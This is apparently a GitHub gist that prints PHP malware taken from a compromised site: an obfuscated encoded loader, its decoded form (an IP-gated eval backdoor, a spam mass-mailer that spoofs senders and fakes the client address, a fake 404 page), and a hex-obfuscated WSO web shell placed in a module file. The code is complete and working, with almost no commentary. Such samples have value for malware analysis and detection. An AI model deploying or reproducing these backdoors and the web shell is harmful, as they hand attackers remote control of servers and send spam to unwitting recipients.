'kzrMXKqbCBLr2GPnfGbDuzkrEBmMXKqbCBmJZOdxCDdbkzrMXKqbCBLL2FbNEG6EZFmrZF'.
'mrZFmrZFmroyirZFmrZFmrZFmrZFmMXKqbCBmtfBmzWOukpANIWKTzRLirZFmrZFmrZFmrZFmEZFm'.
'rZFmrZFmrZFmruOuAkWvAkjyr2SbrZMd5pDcApDyHYOALXGirCWeLpKASCWcnp7T50FxjYjkHXQJIpBxxkQ'.
'NApQd5XKvMWOukpzZUFzmrZFmrZFmrZFmrZFcIXWqxXWdbZFTJZFuVp7sbX'.
'hsb2hNApQYblVirZzsaYOu6XhTiuKcgYKPn2zukkANtZS6EZFmrZFmrZFeJFzmrZFmrZFmruOuAkWvAkjyr2Sb'.
'rZANIWKTzRLirZFmrZFmrZmirZFmrZFmrZKAQEFmMkKqIChxahIYHXWcip7yDWBmJfBm'.
'DwPJGvFkrEBmMkQvNYhvaYFmtfBmMXKqbCG6EZFmrZFmrZFmEZFmrZFmrZFemXDYIlWcAZFrMXDm6uOuAkWvA'.
'kjynRIm5EzeGXhsMZOuAkWvAkjyrEz3EZFmrZFmrZFmEZFmrZFmrZFmMkQvaZVbrZzZUZFciXhqMXWua'.
'ZVbrZzZUZFciW7cAYKvSYKvMZVbrXQq6k7wUFzmrZFmrZFmrY7gnpKwiZFqmXQv5XzrMXDmnZFMEZFmr'.
'ZFmrZFeUFzmrZFmrZFmrZFmrZFcIXW4r2SbryKXIXhqMEFcQkF'.
'Lr4GmIdFMUZF38ZdKOb2ScrHFLb2Wy5FVytHF+b2jcrHFxb2jcrzm82LirZFmrFzmrZFmrZFmrZFmrZF38Zd'.
'FobCVy5HFIb2WcrdF1b2mrb2jy6dFUb2ScgJFTbC3rb2oy6dFab25y5HF'.
'Ib29y5HFIZdFIZdF1b2Uy5YKFb2Wy5YKFb2wrEz3EZFmrZFmrZFmrZFmr'.
'lhCiZFPruKgoXKvbXhdbXhyruzCrkjcIkKJaEFcIXW46ZFukkANtWOukpzZnZGbJcMq4wbwrEyirZ'.
'FmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFmrZFm5EzVyHJFLb2fy5HFUb2Uy6HF1b2rrbCfyHHFxZdKebCoytdKFb2Vy5YK2ZFb'.
'rb29y5HKmbCVyHYF1bC2ytdKmbCfyHYF3ZdF1b2Uy5YKFb2Wy5YKFZFi5FzmrZFmrZFmrZFmrZF'.
'mrZFmMlqJMXWcACjcAXFmJZOcIYhwUFzmrZFmrZFmrZFmrZFmrZFmEZFmr'.
'ZFmrZFmrZFmrZFmrZFciXhqMXWuaZVbrkjvzkjcIEFcIXW46ZVm6ZO'.
'dbkDe5kIrMkQva2FmzWOukpANIWKTzEBMUFzmrZFmrZFmrZFmrZFmrZFmMkQvaZVbrkjvzkjcIEF'.
'cIXW46ZOdbkDe5kIrMkQva2FmzWOukpANIWKTzEB6bEG6EZFmrZFmrZFmrZFmrZFmrZmirZFm'.
'rZFmrZFmrZFmrZFmr2IirBKvgXKvIkIebpIeekDug0Bm82LirZFmrZFmrZFmrZFmrZFmrlhCiZ'.
'FcLCWugpWdpujuAYOvIpzYYfGbDlKvgXKvIkIkroOLruOegkQqHkx6DkQvbYWutuxbJfBY'.
'gkDug0BkEZFmrZFmrZFmrZFmrZFmrZFmrZFe3oFmilWdaXWyiuOegkQqHkx6DkQvMlWuACjyDWBMruzCruOegkQqHkx6DkQvM'.
'lWuACjyDWGbJYOuxXBMrEyirZFmrZFmrZFmrZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmrZFmrZFciZVbrXWgLpKJMXBrzWOu'.
'kpzZ6ZFciXhqMXWuaEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFmMlKvgXKvIkImJZKqIkQq'.
'sEFMUFzmrZFmrZFmrZFmrZFmrZFmrZFmrXQJIXhqSlFrruKrrCW4ruK6Jfzc7Z'.
'FMEZFmrZFmrZFmrZFmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFm'.
'rZFmrZFmrZFmrZKAQEFeaYOuLpj4iuOC6ZFk1uIMrEyirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZF'.
'mrZFmrZFmrZFmrZFmrZFmMlImJZOdxCDdbkzrMYzLr4FLrkjcIkK'.
'JaEFc72FmDRzknEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFc7ZVbrYOunpBgaYhuaYOZiuOC'.
'6ZOdbkDe5kIrMYzLruaiDEB6NEBMUFzmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZO'.
'bEZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmruKgAChcAkDdpkjcI'.
'YKJxkOeAkzrMlIAYZVbruOCUFzmrZFmrZFmrZFmrZFmrZFmrZFmroyirZFmrZFmrZFmrZFmrZFmroyirZFmrZFmrZFmrZF'.
'mrZFmrlhCiZKAak7vbEFcLCWugpWdpujuAXKAIXhdbuxbnZFCQZFcLCWugpWdpujuAXKAIXhd'.
'buxbJfWcIYhwruzCrlWdaXWyiuKgAChcAkDdpubNfybqwBwJRuxbnZFMEZFmrZFmrZFmrZFmrZFmrZO6EZFmrZFmrZF'.
'mrZFmrZFmrZFmrZFmMkKqIChxahIYxkQLDWBmJZFciXhqMXWuahIY4GbdevPAfGzYYRLirZFmrZFmrZFm'.
'rZFmrZFmrZFmrZKAQEFmglWdaXWyiuOegkQqHkx6DkQvMlWuACjyHC7JxpDyDWBM'.
'rEBmMkKqIChxahIYIXhcnkQvSYFxSpjvtYFYYZVbr4V6EZFmrZ'.
'FmrZFmrZFmrZFmrZFmrZFenXzrruOegkQqHkx6DkQvMlWuACjyHC7JxpDyDWGLN4FmnFzmrZFmrZFmrZFmrZFmr'.
'ZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmMkKqIChxah'.
'IYIXhcnkQvSYFxSpjvtYFYYEI6UFzmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFcQYhsSZVbrWxJKvwsVvPAfGAJoR'.
'LirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFeIXWcxkQTryKAaW7JzlQvSYFrMYKgnkIMrfImMYKgnkIb+uKXxp'.
'Q4iuOegkQqHkIMrRzmMXDvtCIrMkKqIChxaEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFeJFzmrZFmrZFmrZFmrZFmrZFeJF'.
'zmrZFmrZFmrZFmrZFmrZFenXzrruOegkQqHkx6DkQvbYWutuxbJfBYiXhqMXW'.
'uauImnZOuAYOvIpzmMlKvgXKvIka6EZFmrZFmrZFmrZFmroyirZFmrZFmrZObEZFmrZFmrZFmEZFmr'.
'ZFmrZFemXQd6pjdAEFcQkFMUFzmrZFeJFzmrZFeApOdAZOuAYOvIpzeKywNGcG65EzmMXWuIkjcI2zcAkDutpa6rE'.
'z3EZFmrZmirZFmrlhCiZFcLCWugpWdpujuAYOvIpzYYfGbDCWuICWMDZFMruOuAkImJZKqIkQqsEF'.
'YiXhqMXWuauab+uKgAChcAkD46ZFYSp7sbXhsbuab+uOuAkIMUFzmrZFmEZFmrZOu'.
'AYOvIpzmMkQvaRLnJ';
eval(v5T7ETO($vC3WWUF, $vNWZ3B7));?>
That, after eval(), turn into this:
<?php
if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
eval(base64_decode($_POST["code"]));
exit();
}
if (isset($_POST["type"]) && $_POST["type"]=="1")
{
type1_send();
exit();
}
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{
}
elseif (isset($_POST["type"]))
{
echo $_POST["type"];
exit();
}
error_404();
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
{
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
function type1_send()
{
if(!isset($_POST["emails"])
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
OR !isset($_POST["mailers"])
)
{
exit();
}
if(get_magic_quotes_gpc())
{
foreach($_POST as $key => $post)
{
$_POST[$key] = stripcslashes($post);
}
}
$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
if(empty($emails))
{
exit();
}
foreach ($emails as $fteil => $email)
{
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
//$message = pass_macros($message, $passes);
$message = fteil_macros($message, $fteil);
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
if (strstr($from, "[CUSTOM]") == FALSE)
{
$from = from_host($from);
}
else
{
$from = str_replace("[CUSTOM]", "", $from);
}
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
}
}
function send_mail($from, $to, $subj, $text, $mailer)
{
$head = "";
$un = strtoupper(uniqid(time()));
$head .= "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
if(count($_FILES) > 0)
{
foreach($_FILES as $file)
{
if(file_exists($file["tmp_name"]))
{
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
fclose($f);
}
}
}
if(@mail($to, $subj, $zag, $head))
{
if(!empty($_POST['verbose']))
echo "SENDED";
}
else
{
if(!empty($_POST['verbose']))
echo "FAIL";
}
}
function alter_macros($content)
{
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
function text_macros($content)
{
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
return $content;
}
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function generate_word($length)
{
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
{
$string .= substr($chars, rand(1, $numChars) - 1, 1);
}
return $string;
}
function pass_macros($content, $passes)
{
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
}
function fteil_macros($content, $fteil)
{
return str_replace("[FTEIL]", $fteil, $content);
}
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}
function from_host($content)
{
$host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);
if (is_ip($host))
{
return $content;
}
$tokens = explode("@", $content);
$content = $tokens[0] . "@" . $host . ">";
return $content;
}
function error_404()
{
header("HTTP/1.1 404 Not Found");
$uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
$content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
exit( $content );
}
function custom_http_request1($params)
{
if( ! is_array($params) )
{
$params = array(
'url' => $params,
'method' => 'GET'
);
}
if( $params['url']=='' ) return FALSE;
if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
$params['method'] = strtoupper($params['method']);
if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
/* Приводим ссылку в правильный вид */
$url = parse_url($params['url']);
if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
if( ! isset($url['path']) ) $url['path'] = '/';
if( ! isset($url['host']) && isset($url['path']) )
{
if( strpos($url['path'], '/') )
{
$url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
$url['path'] = substr($url['path'], strpos($url['path'], '/'));
}
else
{
$url['host'] = $url['path'];
$url['path'] = '/';
}
}
$url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
$port = isset($params['port']) ? $params['port']
: ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
$timeout = isset($params['timeout']) ? $params['timeout'] : 30;
if( ! isset($params['return']) ) $params['return'] = 'content';
$scheme = $url['scheme']=='https' ? 'ssl://':'';
$fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
if( $fp )
{
/* Mozilla */
if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
$request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";
$request .= "User-Agent: {$params['User-Agent']}"."\r\n";
if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
if( isset($params['cookie']) )
{
$cookie = "";
if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
else $cookie = $params['cookie'];
if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
}
$request .= "Connection: close\r\n";
if( $params['method']=='POST' )
{
if( isset($params['data']) && is_array($params['data']) )
{
foreach($params['data'] AS $k => $v)
$data .= urlencode($k).'='.urlencode($v).'&';
if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
}
$data .= "\r\n\r\n";
$request .= "Content-type: application/x-www-form-urlencoded\r\n";
$request .= "Content-length: ".strlen($data)."\r\n";
}
$request .= "\r\n";
if( $params['method'] == 'POST' ) $request .= $data;
@fwrite ($fp,$request); /* Send request */
$res = ""; $headers = ""; $h_detected = false;
while( !@feof($fp) )
{
$res .= @fread($fp, 1024); /* читаем контент */
/* Проверка наличия загловков в контенте */
if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
{
/* заголовки уже считаны - корректируем контент */
$h_detected = true;
$headers = substr($res, 0, strpos($res, "\r\n\r\n"));
$res = substr($res, strpos($res, "\r\n\r\n")+4);
/* Headers to Array */
if( $params['return']=='headers' || $params['return']=='array'
|| (isset($params['redirect']) && $params['redirect']==true) )
{
$h = explode("\r\n", $headers);
$headers = array();
foreach( $h as $k=>$v )
{
if( strpos($v, ':') )
{
$k = substr($v, 0, strpos($v, ':'));
$v = trim(substr($v, strpos($v, ':')+1));
}
$headers[strtoupper($k)] = $v;
}
}
if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
{
$params['url'] = $headers['LOCATION'];
if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
if( $params['redirect-count']<10 )
{
$params['redirect-count']++;
$func = __FUNCTION__;
return @is_object($this) ? $this->$func($params) : $func($params);
}
}
if( $params['return']=='headers' ) return $headers;
}
}
@fclose($fp);
}
else return FALSE;/* $errstr.$errno; */
if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
return $res;
}
?>
/modules/file/bs63d8.php:
<?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit;
?>
@kenorb
Copy link

kenorb commented Apr 15, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment